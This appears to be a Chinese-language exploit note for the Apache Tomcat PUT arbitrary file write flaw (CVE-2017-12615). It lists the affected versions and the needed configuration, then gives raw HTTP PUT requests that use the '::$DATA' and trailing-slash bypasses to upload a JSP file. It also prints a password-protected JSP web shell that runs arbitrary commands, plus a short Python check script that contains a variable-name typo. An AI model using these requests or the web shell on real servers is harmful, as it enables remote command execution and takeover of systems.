Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
利用条件
Apache Tomcat 7.0.0 - 7.0.79
平台: Windows
启用了 HTTP PUT 请求方法 (conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 false)
利用方式
不能直接上传jsp结尾的文件
利用windows平台下:sample.txt::$DATA等价于sample.txt的特性来写shell
1
2
3
4
5
6
7
| PUT /111.jsp::$DATA HTTP/1.1
Host: 10.1.1.6:8080
User-Agent: JNTASS
DNT: 1
Connection: close
...jsp shell...
|
1
2
3
4
5
6
7
| PUT /111.jsp/ HTTP/1.1
Host: 10.1.1.6:8080
User-Agent: JNTASS
DNT: 1
Connection: close
...jsp shell...
|
1
2
3
4
5
6
7
8
9
10
11
12
| <%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
|
检测脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| import requests
def poc(url):
filename="tomcat_check_vuln.txt"
content="test"
try:
requests.put(url+"/"+filename,data=conetent)
res=requests.get(url+"/"+filename)
except :
return False
if res.status_code==200:
return True
return False
|